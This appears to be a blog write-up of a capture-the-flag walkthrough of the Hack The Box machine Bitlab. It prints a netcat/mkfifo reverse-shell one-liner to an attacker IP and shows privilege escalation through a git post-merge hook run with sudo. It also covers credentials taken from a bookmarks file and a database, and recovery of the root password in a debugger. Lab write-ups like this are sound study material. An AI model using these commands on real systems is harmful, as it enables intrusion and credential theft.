https://www.hackthebox.eu/home/machines/profile/207

This is a write-up on how I solved Bitlab from HacktheBox.

Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.

about this box:

Recon:

nmap Network exploration tool and security / port scanner
-sV (Version detection)
-sC Performs a script scan using the default set of scripts.
-o Output file.

Only two ports are opened 22 and 80. We have SSH on port 22 and Gitlab on port 80.

Without directory enumeration with the Gobuster we already know that there is robots.txt which has some disallowed entries.

If we look at the /help/ entry we will see bookmarks.html

Which contains some elements, One of them contains obfuscated data

After deobfuscation, we have a Username and Password.

clave:11des0081x

And we are in!

After the login into Gitlab we know that we have 2 projects and snippets. and with user clave, we probably can edit index.php in Administrator/profile project.

Okay, time to get the Reverse shell.

Then, get the IP address with ifconfig tun0

After getting the IP address change the IP address in the reverse shell

And merge it:

After that, Set Netcat listener with:

nc -nvlp 1234

and to trigger the shell visit:

http://10.10.10.114/profile/index.php

And we are in!

We can execute git pull without root access with a www-data user.

To get the reverse shell as root, all we need is to add bash reverse shell in .git/hooks/post-merge and after git pull, it will execute the command.

Let’s grab the profile(we can edit it as a clave) project on /tmp/

Its all set.

Let’s get the reverse shell as a root!

Add bash Shebang in .git/hooks/post-merge
echo “#!/bin/bash” > .git/hooks/post-merge

Append reverse shell in .git/hooks/post-merge

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.137 1235 >/tmp/f” >> .git/hooks/post-merge

And give it execute permission

chmod +x .git/hooks/post-merge

Set up the listener with Netcat:

nc -nvlp 1235

And run:

sudo git pull

Whoops. The repository is already up to date.

To trigger it we need to make some change on the repository.

Edit README.md

And merge it.

Okay, now we can trigger it.

sudo git pull

And we are root without getting the user.

¯\_(ツ)_/¯

let’s forgot about it and get the user from www-data.

Bingo! we have one snippet with a database name, username, and password.

The snippet executes query which returns all information from profiles table.

I believe the simplest way to execute it is that change the index.php again (with the snippet) and just trigger it with browser.

By itself, it won't give us any information from the query.

Simple googling and we already know how to show all the results.

Commit, merge and open it with the browser.

http://10.10.10.114/profile/index.php

Oh boy. We got the credentials.

Huh? maybe the password is the whole text?

Okay SSH without decoding the value.

And we are in, We got the user clave.

Some reverse-engineering

let’s Download it with Netcat and do some reverse-engineering with OllyDbg.

Set up a listener on our machine with:

nc -l -p 1234 > RemoteConnection.exe

and Send the file with:

nc -w 3 10.10.15.137 < RemoteConnection.exe

And finally, check integrity with the md5sum command.

We got the file.

Before debugging let’s run strings on it.

Mm, nothing really interesting. Maybe it does some SSH Connection? IDK.

let’s see it with OllyDbg.

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. — http://www.ollydbg.de/

So, it does some comparison and after that, it (if it matches) opens the connection.

Open it with OllyDbg and set the breakpoint on JNZ SHORT 00331662

JNZ is jump condition.

And run it.

We have the command in ESI Registry which contains root password.

And we are root, AGAIN!

I hope you enjoyed!

Follow me for future posts.

Twitter — https://twitter.com/ls4cfk

Born at a very young age.